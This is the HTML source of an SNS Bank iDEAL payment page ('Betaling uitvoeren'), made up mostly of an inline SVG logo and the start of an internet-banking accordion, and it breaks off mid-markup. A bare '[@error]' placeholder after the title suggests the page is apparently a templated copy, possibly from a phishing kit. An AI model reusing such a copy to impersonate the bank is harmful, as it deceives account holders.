<html data-ng-strict-di="" data-ng-app="fp-ideal" fp-label="sns" class="ng-scope" lang="nl"><head>
    <style type="text/css">
        @charset "UTF-8";
        [ng\:cloak],
        [ng-cloak],
        [data-ng-cloak],
        [x-ng-cloak],
        .ng-cloak,
        .x-ng-cloak,
        .ng-hide:not(.ng-hide-animate) {
            display: none !important;
        }
        
        ng\:form {
            display: block;
        }
        
        .ng-animate-shim {
            visibility: hidden;
        }
        
        .ng-anchor {
            position: absolute;
        }
    </style>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Betaling uitvoeren - SNS Bank</title>
    <link href="/public/sns/style.css" rel="stylesheet">

</head>

<body class="fp body--lightest">
    <!-- ngInclude: -->
    <div ng-include="" src="'ideal/main.template.html'" class="ng-scope">
        <fp-ideal class="ng-scope ng-isolate-scope">
            <fc-header layout="small" class="ng-isolate-scope">
                <header class="fc-header">
                    <div class="fc-header__container canvas-small" ng-class="{'canvas': $ctrl.layout !== 'small', 'canvas-small': $ctrl.layout === 'small'}">
                        <div class="fc-header__logo-container">
                            <fp-icon color="primary" name="logo" size="100% 100%" class="ng-isolate-scope">
                                <!-- ngInclude: svgPath -->
                                <div class="fc-icon-container ng-scope fc-icon fc-icon--logo fc-icon--small fc-icon--primary" ng-class="containerClasses()" ng-style="containerStyle()" ng-include="svgPath" style="width: 100%; height: 100%;">
                                    <!--?xml version="1.0" encoding="UTF-8" standalone="no"?-->
                                    <svg xmlns="http://www.w3.org/2000/svg" class="replaced-svg ng-scope" viewBox="0 0 283.46512 97.166789" height="97.166786" width="283.46512">
                                        <path style="fill:#ffffff" id="path297" d="m 96.924542,48.603364 c 0,26.693 -21.637,48.328 -48.326,48.328 -26.693,0 -48.33000014,-21.635 -48.33000014,-48.327 0,-26.687 21.63700014,-48.32599954 48.33000014,-48.32599954 26.69,0 48.326,21.63999954 48.326,48.32699954 z"></path>
                                        <circle style="fill:#ffffff" id="circle299" r="48.546001" cy="48.583363" cx="48.583542"></circle>
                                        <linearGradient gradientTransform="matrix(0.085,0.024,-0.024,0.085,221.82654,32.632364)" y2="627.98798" x2="-1399.905" y1="627.98798" x1="-1618.062" gradientUnits="userSpaceOnUse" id="a">
                                            <stop id="stop301" stop-color="#E53121" offset="0"></stop>
                                            <stop id="stop303" stop-color="#C22C1A" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#a)" id="path306" d="m 48.584542,48.583364 18.023,-9.992 28.665,23.382 -46.687,-13.39"></path>
                                        <path style="fill:#e53121" id="path308" d="m 66.606542,38.591364 28.665,23.382 -2.854,-1.497 -25.877,-21.105 z"></path>
                                        <path style="fill:#f08465" id="path310" d="m 48.584542,48.583364 18.023,-9.992 -0.067,0.78 -16.27,9.018 z"></path>
                                        <path style="fill:#b82b18" id="path312" d="m 95.271542,61.973364 -46.687,-13.39 1.685,-0.194 42.148,12.087 z"></path>
                                        <path style="fill:#f5b0ac" id="path314" d="m 48.584542,48.583364 18.023,-9.992 -4.637,-36.6999995 -13.385,46.6919995"></path>
                                        <path style="fill:#d47785" id="path316" d="m 61.969542,1.8933645 -13.385,46.6899995 1.057,-1.332 12.083,-42.1479995 z"></path>
                                        <path style="fill:#d99e9b" id="path318" d="m 66.606542,38.591364 -4.637,-36.6999995 -0.245,3.212 4.186,33.1299995 z"></path>
                                        <path style="fill:#f9d1cd" id="path320" d="m 48.584542,48.583364 18.023,-9.992 -0.696,-0.36 -16.27,9.02 z"></path>
                                        <path style="fill:none" id="path322" d="m 48.584542,48.583364 9.99,18.024 -23.38,28.666 13.39,-46.69"></path>
                                        <path style="fill:#f9f9fc" id="path324" d="m 58.574542,66.607364 -23.38,28.666 1.495,-2.857 21.105,-25.877 z"></path>
                                        <path style="fill:#f3f2f9" id="path326" d="m 48.584542,48.583364 9.99,18.024 -0.78,-0.068 -9.017,-16.27 z"></path>
                                        <path style="fill:#dcdaee" id="path328" d="m 35.194542,95.273364 13.39,-46.69 0.193,1.685 -12.087,42.148 z"></path>
                                        <path style="fill:#2b2b85" id="path330" d="m 48.584542,48.583364 9.99,18.024 36.698,-4.634 -46.688,-13.39"></path>
                                        <path style="fill:#484293" id="path332" d="m 95.272542,61.973364 -46.688,-13.39 1.33,1.057 42.15,12.083 z"></path>
                                        <path style="fill:#24236f" id="path334" d="m 58.574542,66.607364 36.698,-4.634 -3.21,-0.25 -33.13,4.187 z"></path>
                                        <path style="fill:#8f88c0" id="path336" d="m 48.584542,48.583364 9.99,18.024 0.358,-0.697 -9.02,-16.27 z"></path>
                                        <linearGradient gradientTransform="matrix(0.085,0.024,-0.024,0.085,221.82654,32.632364)" y2="791.76398" x2="-1814.438" y1="791.76398" x1="-2361.907" gradientUnits="userSpaceOnUse" id="b">
                                            <stop id="stop338" stop-color="#DCDAEE" offset="0"></stop>
                                            <stop id="stop340" stop-color="#8F88C0" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#b)" id="path343" d="m 48.584542,48.583364 -18.026,9.99 -28.6640001,-23.38 46.6900001,13.39"></path>
                                        <path style="fill:#bbb7db" id="path345" d="m 30.558542,58.573364 -28.6640001,-23.38 2.854,1.494 25.8800001,21.11 z"></path>
                                        <path style="fill:#b0aad4" id="path347" d="m 48.584542,48.583364 -18.026,9.99 0.07,-0.776 16.27,-9.02 z"></path>
                                        <path style="fill:#d1cce6" id="path349" d="m 1.8945419,35.193364 46.6900001,13.39 -1.687,0.193 -42.1480001,-12.09 z"></path>
                                        <path style="fill:#ffdd00" id="path351" d="m 48.584542,48.583364 -18.026,9.99 4.636,36.7 13.39,-46.69"></path>
                                        <path style="fill:#dbbb85" id="path353" d="m 35.194542,95.273364 13.39,-46.69 -1.06,1.33 -12.083,42.147 z"></path>
                                        <path style="fill:#ebc536" id="path355" d="m 30.558542,58.573364 4.636,36.7 0.247,-3.213 -4.186,-33.128 z"></path>
                                        <path style="fill:#ffe167" id="path357" d="m 48.584542,48.583364 -18.026,9.99 0.697,0.36 16.268,-9.02 z"></path>
                                        <path style="fill:#e53121" id="path359" d="m 48.584542,48.583364 -9.994,-18.026 23.38,-28.6629995 -13.386,46.6899995"></path>
                                        <path style="fill:#ea583c" id="path361" d="m 38.590542,30.557364 23.38,-28.6629995 -1.493,2.855 -21.105,25.8799995 z"></path>
                                        <path style="fill:#d42f1e" id="path363" d="m 48.584542,48.583364 -9.994,-18.026 0.78,0.07 9.02,16.27 z"></path>
                                        <path style="fill:#c22c1a" id="path365" d="m 61.969542,1.8933645 -13.385,46.6899995 -0.194,-1.687 12.087,-42.1479995 z"></path>
                                        <path style="fill:#f3f2f9" id="path367" d="m 48.584542,48.583364 -9.994,-18.026 -36.6970001,4.636 46.6900001,13.39"></path>
                                        <path style="fill:#f9f8fb" id="path369" d="m 1.8935419,35.193364 46.6900001,13.39 -1.33,-1.06 -42.1500001,-12.083 z"></path>
                                        <path style="fill:#dcdaee" id="path371" d="m 38.590542,30.557364 -36.6970001,4.636 3.21,0.247 33.1300001,-4.184 z"></path>
                                        <path style="fill:#f9f9fc" id="path373" d="m 48.584542,48.583364 -9.994,-18.026 -0.357,0.7 9.02,16.265 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,223.68954,20.156364)" y2="-6.7750001" x2="-625.72601" y1="18.083" x1="-532.953" gradientUnits="userSpaceOnUse" id="c">
                                            <stop id="stop375" stop-color="#7B73B3" offset="0"></stop>
                                            <stop id="stop377" stop-color="#C6C2E2" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#c)" id="path380" d="m 83.528542,14.836364 a 48.355,48.355 0 0 0 -21.56,-12.9439995 l 4.64,36.6979995 16.92,-23.755 z"></path>
                                        <path style="fill:#8f88c0" id="path382" d="m 61.969542,1.8933645 4.638,36.6979995 0.432,-1.728 -4.358,-34.7629995 c -0.24,-0.07 -0.474,-0.14 -0.71,-0.208 z"></path>
                                        <path style="fill:#a59fce" id="path384" d="m 83.070542,14.370364 -16.034,22.493 -0.43,1.728 16.923,-23.753 c -0.152,-0.16 -0.304,-0.316 -0.46,-0.468 z"></path>
                                        <linearGradient gradientTransform="matrix(0.089,0,0,0.089,219.09454,28.148364)" y2="-293.51901" x2="-1768.318" y1="-149.155" x1="-1518.272" gradientUnits="userSpaceOnUse" id="d">
                                            <stop id="stop386" stop-color="#6C62A8" offset="0"></stop>
                                            <stop id="stop388" stop-color="#CBCAE6" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#d)" id="path391" d="m 83.528542,14.836364 a 48.355,48.355 0 0 0 -21.56,-12.9439995 l 0.883,1.62 a 47.004,47.004 0 0 1 19.454,11.9249995 l 1.222,-0.602 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,223.68954,20.156364)" y2="89.109001" x2="-518.39899" y1="2.7720001" x1="-568.24597" gradientUnits="userSpaceOnUse" id="e">
                                            <stop id="stop393" stop-color="#E53121" offset="0"></stop>
                                            <stop id="stop395" stop-color="#A62714" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#e)" id="path398" d="m 66.606542,38.591364 16.922,-23.755 a 48.784,48.784 0 0 1 12.19,21.995 l -29.11,1.76 z"></path>
                                        <path style="fill:#ed6f50" id="path400" d="m 83.530542,14.838364 -16.924,23.753 1.313,-0.727 16.064,-22.547 c -0.15,-0.16 -0.3,-0.32 -0.453,-0.478 z"></path>
                                        <path style="fill:#a62714" id="path402" d="m 95.554542,36.187364 -27.636,1.676 -1.312,0.728 29.112,-1.76 c -0.053,-0.215 -0.108,-0.43 -0.164,-0.644 z"></path>
                                        <linearGradient gradientTransform="matrix(0.089,0,0,0.089,219.09454,28.148364)" y2="103.637" x2="-1381.943" y1="-146.423" x1="-1526.3149" gradientUnits="userSpaceOnUse" id="f">
                                            <stop id="stop404" stop-color="#E84D2C" offset="0"></stop>
                                            <stop id="stop406" stop-color="#811F08" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#f)" id="path409" d="m 94.232542,36.263364 a 47.528,47.528 0 0 0 -11.017,-19.87 l 0.31,-1.557 a 48.797,48.797 0 0 1 12.192,21.995 l -1.486,-0.567 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,223.68954,20.156364)" y2="167.476" x2="-498.875" y1="50.368999" x1="-541.49902" gradientUnits="userSpaceOnUse" id="g">
                                            <stop id="stop411" stop-color="#F3F2F9" offset="0"></stop>
                                            <stop id="stop413" stop-color="#BBB7DB" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#g)" id="path416" d="m 66.606542,38.591364 29.113,-1.76 c 2.004,8.006 1.99,16.636 -0.448,25.142 z"></path>
                                        <path style="fill:#d1cee8" id="path418" d="m 95.719542,36.831364 -29.112,1.76 1.694,0.544 27.573,-1.665 c -0.05,-0.214 -0.1,-0.428 -0.154,-0.64 z"></path>
                                        <path style="fill:#f3f2f9" id="path420" d="m 95.271542,61.973364 c 0.067,-0.23 0.13,-0.46 0.19,-0.688 l -27.16,-22.15 -1.694,-0.544 28.665,23.382 z"></path>
                                        <linearGradient gradientTransform="matrix(0.089,0,0,0.089,219.09454,28.148364)" y2="252.097" x2="-1349.911" y1="227.633" x1="-1435.2271" gradientUnits="userSpaceOnUse" id="h">
                                            <stop id="stop422" stop-color="#fff" offset="0"></stop>
                                            <stop id="stop424" stop-color="#BBB7DB" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#h)" id="path427" d="m 94.359542,60.391364 c 2,-7.732 1.96,-15.54 0.203,-22.833 l 1.157,-0.727 c 2.004,8.006 1.99,16.632 -0.448,25.142 z"></path>
                                        <linearGradient gradientTransform="matrix(0.085,0.024,-0.024,0.085,221.82654,32.632364)" y2="572.646" x2="-1995.1379" y1="572.646" x1="-2357.189" gradientUnits="userSpaceOnUse" id="i">
                                            <stop id="stop429" stop-color="#FFF098" offset="0"></stop>
                                            <stop id="stop431" stop-color="#FFD530" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#i)" id="path434" d="m 14.836542,13.637364 c -5.9440001,5.73 -10.5040001,13.052 -12.9430001,21.557 l 36.6970001,-4.636 -23.755,-16.92 z"></path>
                                        <path style="fill:#ffcb00" id="path436" d="m 1.8935419,35.193364 36.6970001,-4.637 -1.73,-0.43 -34.7600001,4.36 c -0.07,0.236 -0.14,0.47 -0.207,0.707 z"></path>
                                        <path style="fill:#ffdd00" id="path438" d="m 14.368542,14.093364 22.493,16.033 1.73,0.43 -23.75,-16.92 c -0.16,0.152 -0.315,0.303 -0.473,0.458 z"></path>
                                        <path style="fill:#fff8c7" id="path440" d="m 14.834542,13.637364 a 48.356,48.356 0 0 0 -12.9400001,21.557 l 1.617,-0.878 a 47.009,47.009 0 0 1 11.9250001,-19.453 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,223.68954,20.156364)" y2="-6.7550001" x2="-674.81897" y1="-44.666" x1="-778.979" gradientUnits="userSpaceOnUse" id="j">
                                            <stop id="stop442" stop-color="#F4A286" offset="0"></stop>
                                            <stop id="stop444" stop-color="#E53121" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#j)" id="path447" d="m 38.590542,30.557364 -23.754,-16.92 a 48.787,48.787 0 0 1 21.993,-12.1899995 l 1.76,29.1099995 z"></path>
                                        <path style="fill:#e53121" id="path449" d="m 14.841542,13.637364 23.75,16.92 -0.725,-1.308 -22.548,-16.066 c -0.162,0.15 -0.32,0.3 -0.477,0.454 z m 21.348,-12.0239995 1.678,27.6359995 0.725,1.308 -1.76,-29.1099995 -0.642,0.165 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,223.68954,20.156364)" y2="-73.237999" x2="-700.724" y1="-23.393999" x1="-787.05701" gradientUnits="userSpaceOnUse" id="k">
                                            <stop id="stop451" stop-color="#F4A286" offset="0"></stop>
                                            <stop id="stop453" stop-color="#E53121" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#k)" id="path456" d="m 36.266542,2.9333645 a 47.513,47.513 0 0 0 -19.877,11.0169995 l -1.555,-0.313 a 48.804,48.804 0 0 1 21.995,-12.1899995 l -0.564,1.487 z"></path>
                                        <linearGradient gradientTransform="matrix(0.085,0.024,-0.024,0.085,221.82654,32.632364)" y2="353.97299" x2="-1814.233" y1="353.97299" x1="-2088.0381" gradientUnits="userSpaceOnUse" id="l">
                                            <stop id="stop458" stop-color="#4464AC" offset="0"></stop>
                                            <stop id="stop460" stop-color="#1D3584" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#l)" id="path463" d="m 38.590542,30.557364 -1.76,-29.1099995 c 8.008,-2.00500004 16.634,-1.99200004 25.14,0.448 z"></path>
                                        <path style="fill:#1e398e" id="path465" d="m 36.829542,1.4463645 1.76,29.1099995 0.546,-1.694 -1.666,-27.5699995 c -0.213,0.05 -0.428,0.1 -0.64,0.153 z"></path>
                                        <path style="fill:#2f2482" id="path467" d="m 61.969542,1.8933645 a 68.023,68.023 0 0 0 -0.683,-0.19 l -22.15,27.1599995 -0.546,1.693 23.38,-28.6619995 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,223.69054,20.156364)" y2="-70.501999" x2="-606.81403" y1="-70.501999" x1="-701.32397" gradientUnits="userSpaceOnUse" id="m">
                                            <stop id="stop469" stop-color="#4464AC" offset="0"></stop>
                                            <stop id="stop471" stop-color="#2F4B97" offset=".373"></stop>
                                            <stop id="stop473" stop-color="#223B89" offset=".728"></stop>
                                            <stop id="stop475" stop-color="#1D3584" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#m)" id="path478" d="m 60.391542,2.8063645 c -7.734,-2.00000004 -15.54,-1.96000004 -22.834,-0.203 l -0.727,-1.156 c 8.01,-2.00500004 16.634,-1.99200004 25.14,0.448 l -1.578,0.91 z"></path>
                                        <path style="fill:#2b2b85" id="path480" d="m 13.638542,82.328364 a 48.356,48.356 0 0 0 21.556,12.945 l -4.636,-36.7 z"></path>
                                        <path style="fill:#24236f" id="path482" d="m 35.194542,95.273364 -4.636,-36.7 -0.43,1.73 4.358,34.762 c 0.237,0.072 0.472,0.14 0.708,0.208 z"></path>
                                        <path style="fill:#5b549f" id="path484" d="m 14.096542,82.795364 16.03,-22.492 0.432,-1.73 -16.92,23.755 0.457,0.467 z"></path>
                                        <linearGradient gradientTransform="matrix(0.089,0,0,0.089,219.09454,28.148364)" y2="718.90997" x2="-2053.6909" y1="641.97101" x1="-2322.01" gradientUnits="userSpaceOnUse" id="n">
                                            <stop id="stop486" stop-color="#5B62A2" offset="0"></stop>
                                            <stop id="stop488" stop-color="#4C579A" offset=".152"></stop>
                                            <stop id="stop490" stop-color="#31438C" offset=".482"></stop>
                                            <stop id="stop492" stop-color="#213783" offset=".776"></stop>
                                            <stop id="stop494" stop-color="#1B3380" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#n)" id="path497" d="m 13.638542,82.330364 a 48.374,48.374 0 0 0 21.556,12.945 l -0.88,-1.62 a 47.029,47.029 0 0 1 -19.454,-11.927 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,223.68954,20.156364)" y2="236.214" x2="-773.039" y1="145.035" x1="-781.01703" gradientUnits="userSpaceOnUse" id="o">
                                            <stop id="stop499" stop-color="#fff" offset="0"></stop>
                                            <stop id="stop501" stop-color="#DAD8ED" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#o)" id="path504" d="m 30.558542,58.573364 -16.92,23.755 a 48.802,48.802 0 0 1 -12.1920001,-21.992 l 29.1120001,-1.762 z"></path>
                                        <path style="fill:#b0aad4" id="path506" d="m 13.638542,82.328364 16.92,-23.754 -1.31,0.726 -16.066,22.55 c 0.15,0.16 0.303,0.32 0.456,0.48 z"></path>
                                        <path style="fill:#dad8ed" id="path508" d="m 1.6145419,60.975364 27.6340001,-1.676 1.31,-0.725 -29.1100001,1.76 c 0.052,0.218 0.108,0.43 0.166,0.642 z"></path>
                                        <linearGradient gradientTransform="matrix(0.089,0,0,0.089,219.09454,28.148364)" y2="516.763" x2="-2280.7471" y1="460.06" x1="-2478.4951" gradientUnits="userSpaceOnUse" id="p">
                                            <stop id="stop510" stop-color="#fff" offset="0"></stop>
                                            <stop id="stop512" stop-color="#D1CEE8" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#p)" id="path515" d="m 2.9335419,60.903364 a 47.52,47.52 0 0 0 11.0170001,19.872 l -0.312,1.555 a 48.814,48.814 0 0 1 -12.1920001,-21.994 l 1.487,0.566 z"></path>
                                        <path style="fill:#e53121" id="path517" d="m 30.558542,58.573364 -29.1120001,1.763 c -2.00300004,-8.008 -1.99000004,-16.636 0.448,-25.142 l 28.6640001,23.38 z"></path>
                                        <path style="fill:#ca2d0a" id="path519" d="m 1.4465419,60.333364 29.1120001,-1.76 -1.694,-0.542 -27.5700001,1.666 c 0.048,0.213 0.1,0.424 0.152,0.637 z"></path>
                                        <path style="fill:#ed6f50" id="path521" d="m 1.8945419,35.193364 c -0.064,0.23 -0.13,0.458 -0.19,0.685 l 27.1600001,22.153 1.694,0.543 -28.6640001,-23.38 z m 0.912,1.58 c -2.00000004,7.734 -1.96000004,15.54 -0.204,22.836 l -1.156,0.727 a 48.362,48.362 0 0 1 0.447,-25.14 l 0.914,1.577 z"></path>
                                        <linearGradient gradientTransform="matrix(0.085,0.024,-0.024,0.085,221.82654,32.632364)" y2="847.09601" x2="-1266.402" y1="847.09601" x1="-1649.707" gradientUnits="userSpaceOnUse" id="q">
                                            <stop id="stop523" stop-color="#D1CEE8" offset="0"></stop>
                                            <stop id="stop525" stop-color="#7B73B3" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#q)" id="path528" d="m 82.329542,83.527364 a 48.344,48.344 0 0 0 12.942,-21.555 l -36.697,4.634 23.755,16.92 z"></path>
                                        <path style="fill:#7b73b3" id="path530" d="m 95.272542,61.973364 -36.697,4.635 1.728,0.43 34.76,-4.357 c 0.07,-0.236 0.14,-0.472 0.208,-0.708 z"></path>
                                        <path style="fill:#d1cee8" id="path532" d="m 82.796542,83.070364 -22.492,-16.033 -1.73,-0.43 23.755,16.924 c 0.155,-0.152 0.31,-0.308 0.467,-0.46 z"></path>
                                        <path style="fill:#655ea5" id="path534" d="m 82.329542,83.531364 c 5.944,-5.73 10.504,-13.055 12.942,-21.56 l -1.617,0.88 a 47.006,47.006 0 0 1 -11.928,19.453 l 0.603,1.228 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,223.68954,20.156364)" y2="272.22299" x2="-566.37799" y1="174.69" x1="-622.68799" gradientUnits="userSpaceOnUse" id="r">
                                            <stop id="stop536" stop-color="#E53121" offset="0"></stop>
                                            <stop id="stop538" stop-color="#B02916" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#r)" id="path541" d="m 58.574542,66.607364 23.755,16.92 a 48.82,48.82 0 0 1 -21.993,12.19 z"></path>
                                        <path style="fill:#e53121" id="path543" d="m 82.328542,83.531364 -23.754,-16.924 0.727,1.31 22.546,16.067 c 0.162,-0.147 0.323,-0.3 0.482,-0.452 z m -21.352,12.022 -1.675,-27.635 -0.727,-1.31 1.76,29.11 c 0.216,-0.054 0.43,-0.11 0.642,-0.165 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,223.68954,20.156364)" y2="236.737" x2="-528.86298" y1="286.57999" x1="-615.19299" gradientUnits="userSpaceOnUse" id="s">
                                            <stop id="stop545" stop-color="#E53121" offset="0"></stop>
                                            <stop id="stop547" stop-color="#9D2511" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#s)" id="path550" d="m 60.903542,94.230364 a 47.512,47.512 0 0 0 19.872,-11.016 l 1.554,0.317 a 48.858,48.858 0 0 1 -21.993,12.19 l 0.567,-1.49 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,145.01254,73.580364)" y2="83.778" x2="-312.79599" y1="22.091999" x1="-374.48199" gradientUnits="userSpaceOnUse" id="t">
                                            <stop id="stop552" stop-color="#F5B0AC" offset="0"></stop>
                                            <stop id="stop554" stop-color="#EF8495" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#t)" id="path557" d="m 58.574542,66.607364 1.762,29.11 c -8.008,2.003 -16.636,1.99 -25.143,-0.444 l 23.38,-28.666 z"></path>
                                        <path style="fill:#f5b0ac" id="path559" d="m 60.334542,95.719364 -1.76,-29.11 -0.546,1.692 1.67,27.572 c 0.21,-0.05 0.423,-0.104 0.636,-0.154 z"></path>
                                        <path style="fill:#fad9d5" id="path561" d="m 35.194542,95.273364 0.686,0.19 22.15,-27.163 0.545,-1.693 -23.382,28.666 z"></path>
                                        <linearGradient gradientTransform="matrix(0.266,0,0,0.266,140.75854,20.156364)" y2="284.237" x2="-301.134" y1="284.237" x1="-395.642" gradientUnits="userSpaceOnUse" id="u">
                                            <stop id="stop563" stop-color="#F5B0AC" offset="0"></stop>
                                            <stop id="stop565" stop-color="#EE788F" offset="1"></stop>
                                        </linearGradient>
                                        <path style="fill:url(#u)" id="path568" d="m 36.774542,94.359364 c 7.735,2 15.542,1.96 22.835,0.205 l 0.728,1.157 a 48.386,48.386 0 0 1 -25.138,-0.447 l 1.576,-0.914 z"></path>
                                        <path style="fill:#ffffff" id="path570" d="m 147.80654,44.803364 c -1.724,-0.445 -10.532,-2.83 -10.76,-2.894 -4.134,-1.17 -5.083,-2.97 -5.083,-5.346 l 0.003,-2.343 c 0,-1.877 1.065,-3.378 2.474,-3.902 1.083,-0.404 2.293,-0.475 4.43,-0.475 h 18.708 c 0.482,0 0.87,-0.397 0.875,-0.888 l 0.006,-4.263 c 0,-1.94 -0.05,-3.828 -1.928,-5.26 -1.043,-0.796 -2.756,-1.508 -5.266,-2.003 -2.716,-0.534 -7.03,-0.93 -12.794,-0.93 -9.312,0 -14.525,1.886 -18.104,5.98 -0.87,1 -3.822,5.24 -3.822,11.828 0,3.09 -0.008,4.118 0.035,4.79 0.654,10.19 7.45,13.06 14.27,14.823 1.728,0.443 10.13,2.727 10.358,2.79 4.135,1.17 5.193,2.972 5.193,5.347 l -0.002,2.65 c 0,1.88 -1.178,3.38 -2.584,3.902 -1.084,0.404 -2.598,0.47 -4.735,0.47 l -21.746,0.003 a 0.883,0.883 0 0 0 -0.863,0.893 v 2.178 c 0.098,3.747 0.59,6.427 3.042,8.157 1.935,1.365 5.6,3.236 17.54,3.236 h 1.326 c 6.838,-0.24 11.244,-1.182 14.193,-2.54 2.647,-1.218 4.063,-2.454 5.333,-3.858 1.576,-1.748 4.03,-5.855 4.31,-11.416 0.04,-0.76 0.03,-4.917 0,-5.392 -0.652,-10.187 -7.59,-13.776 -14.412,-15.538 z m 74.698,-27.448 h -7.988 c -2.924,0 -3.566,0.698 -3.568,3.555 v 32.132 l -0.406,-0.003 c -1.902,-2.72 -17.955,-25.83 -21.596,-31.007 -1.998,-2.84 -4.654,-4.677 -8.797,-4.68 h -5.566 c -0.494,0 -0.896,0.4 -0.896,0.895 v 60.9 c 0.003,2.858 0.646,3.556 3.57,3.556 h 7.997 c 2.926,0 3.566,-0.696 3.568,-3.554 v -32.19 l 0.438,0.01 22.146,31.623 c 1.997,2.52 4.796,4.112 8.25,4.112 h 5.52 c 0.495,0 0.895,-0.4 0.895,-0.895 v -60.9 c 0,-2.857 -0.643,-3.555 -3.567,-3.555 z m 60.934,42.987 c -0.654,-10.19 -7.592,-13.778 -14.414,-15.54 -1.725,-0.445 -10.533,-2.83 -10.76,-2.894 -4.137,-1.17 -5.084,-2.97 -5.084,-5.346 l 0.002,-2.343 c 0,-1.877 1.064,-3.378 2.475,-3.902 1.085,-0.404 2.294,-0.475 4.43,-0.475 h 18.71 c 0.48,0 0.87,-0.397 0.876,-0.888 -0.002,-0.078 0.004,-4.015 0.004,-4.263 0,-1.94 -0.053,-3.828 -1.928,-5.26 -1.043,-0.796 -2.756,-1.508 -5.266,-2.003 -2.715,-0.534 -7.03,-0.93 -12.794,-0.93 -9.312,0 -14.523,1.886 -18.104,5.98 -0.87,1 -3.822,5.24 -3.822,11.828 0,3.09 -0.008,4.118 0.035,4.79 0.655,10.19 7.452,13.06 14.272,14.823 1.727,0.443 10.13,2.727 10.355,2.79 4.135,1.17 5.195,2.972 5.195,5.347 l -0.002,2.65 c 0,1.88 -1.178,3.38 -2.584,3.902 -1.086,0.404 -2.598,0.47 -4.734,0.47 l -21.746,0.003 a 0.88,0.88 0 0 0 -0.86,0.893 c -0.003,1.162 0,0.385 0,2.178 0.097,3.747 0.59,6.427 3.04,8.157 1.936,1.365 5.602,3.236 17.54,3.236 h 1.327 c 6.838,-0.24 11.244,-1.182 14.195,-2.54 2.646,-1.218 4.062,-2.454 5.33,-3.858 1.578,-1.748 4.033,-5.855 4.312,-11.416 0.04,-0.76 0.03,-4.917 0.002,-5.39 z"></path>
                                    </svg>
                                </div>
                            </fp-icon>
                        </div>
                        <!-- ngIf: $ctrl.onLogout -->
                    </div>
                </header>
            </fc-header>
            <div class="canvas-small">
                <h1>

        <fp-content key="title" class="ng-scope">Betaling uitvoeren</fp-content>
    </h1>
[@error]



                <!-- ngView: -->
                <ng-view class="ng-scope">
                    <signing-page sp="sp" trx-id="trxId" class="ng-scope ng-isolate-scope">

                        <sign sp="$ctrl.sp" trx-id="$ctrl.trxId" on-cancel="$ctrl.onCancel()" on-submit="$ctrl.onSubmit()" on-success="$ctrl.onSuccess()" on-failure="$ctrl.onFailure()" has-session="$ctrl.ready" on-signed="$ctrl.onSigned()" signing="$ctrl.signing" logout-finished="$ctrl.logoutFinished" class="ng-isolate-scope">
                            <fp-accordion class="ng-isolate-scope">
                                <div class="accordion">
                                    <ng-transclude>
                                        <!-- ngIf: !$ctrl.supportsApp -->
                                        <fp-accordion-item ng-if="!$ctrl.supportsApp" icon-name="digipas" accordion-item-title="Betalen met Internetbankieren" class="ng-scope ng-isolate-scope">
                                            <div class="accordion__item">
                                                <div class="accordion__heading switch" ng-click="$ctrl.toggle()" fp-switch="AccordionItemSwitchKey34" ng-attr-fp-switch-group="{{$ctrl.groupName}}" ng-attr-fp-switch-active="{{$ctrl.initOpen &amp;&amp; $ctrl.parent.singleItemOpen}}" fp-switch-group="" fp-switch-active="false">
                                                    <!-- ngIf: $ctrl.iconName -->
                                                    <fp-icon class="accordion__icon ng-scope ng-isolate-scope" ng-if="$ctrl.iconName" name="digipas" color="inherit" size="medium" vertical-centered="">
                                                        <!-- ngInclude: svgPath -->
                                                        <div class="fc-icon-container ng-scope fc-icon fc-icon--digipas fc-icon--medium fc-icon--inherit" ng-class="containerClasses()" ng-style="containerStyle()" ng-include="svgPath">
                                                            <!--?xml version="1.0" encoding="UTF-8" ?-->
                                                            <svg xmlns="http://www.w3.org/2000/svg" id="digipas" viewBox="0 0 50 79" aria-labelledby="title" class="ng-scope">
                                                                <title>Digipas</title>
                                                                <g stroke="none">
                                                                    <g transform="translate(-273.000000, -701.000000)">
                                                                        <g transform="translate(134.000000, 510.000000)">
                                                                            <g transform="translate(0.000000, 107.000000)">
                                                                                <g transform="translate(77.000000, 24.000000)">
                                                                                    <g transform="translate(0.000000, 47.000000)">
